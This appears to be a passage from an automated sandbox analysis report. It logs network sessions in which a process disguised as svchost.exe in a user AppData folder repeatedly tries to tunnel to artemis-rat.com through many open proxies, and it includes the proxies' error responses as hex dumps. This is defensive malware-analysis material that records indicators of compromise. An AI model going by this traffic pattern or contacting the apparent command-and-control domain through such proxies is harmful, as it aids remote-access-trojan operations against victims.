61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Mar 9, 2024 13:14:30.687737942 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.21.6 Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.21.6</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2449	192.168.2.5	58042	31.204.28.136	5432	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.366843939 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.571443081 CET	308	IN	HTTP/1.1 407 Proxy Authentication Required Server: FaaS v1.3-20220203-7fa38bd5af Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 65 Proxy-Authenticate: Basic realm="Proxy" Connection: close Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64 Data Ascii: HTTP authorization error: ip auth failed, no credentials provided

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2450	192.168.2.5	58109	104.16.207.86	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.394741058 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.549120903 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2451	192.168.2.5	58102	162.159.243.178	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.398443937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.559618950 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2452	192.168.2.5	58040	38.162.13.126	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.398452044 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.814990997 CET	111	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="" Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 Data Ascii: Proxy Authentication Required

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2453	192.168.2.5	57486	111.20.217.178	9091	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.398502111 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.833517075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.146285057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.646675110 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2454	192.168.2.5	58137	185.238.228.67	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.399668932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.554184914 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2455	192.168.2.5	58065	38.54.95.19	8060	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.399698019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.942711115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.646262884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.146240950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.833692074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.646239042 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2456	192.168.2.5	57947	51.210.223.9	3000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.399945021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2457	192.168.2.5	58146	104.23.128.174	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.400064945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.554299116 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2458	192.168.2.5	57976	46.17.63.166	10000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.400518894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.695559978 CET	339	IN	HTTP/1.1 403 Forbidden Server: squid/4.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html;charset=utf-8 Content-Length: 5 X-Squid-Error: TCP_RESET 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from proxy.wakoopa.com Via: 1.1 proxy.wakoopa.com (squid/4.7) Connection: keep-alive Data Raw: 72 65 73 65 74 Data Ascii: reset

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2459	192.168.2.5	57921	123.126.158.50	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.400559902 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2460	192.168.2.5	58154	104.20.178.166	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.400639057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.555161953 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2461	192.168.2.5	57929	47.93.121.200	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.400639057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.731861115 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Mar 9, 2024 13:14:30.734910965 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2462	192.168.2.5	58012	184.185.2.12	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.400687933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2463	192.168.2.5	58161	203.24.108.194	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.400719881 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.555301905 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2464	192.168.2.5	58163	104.17.166.210	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.400777102 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
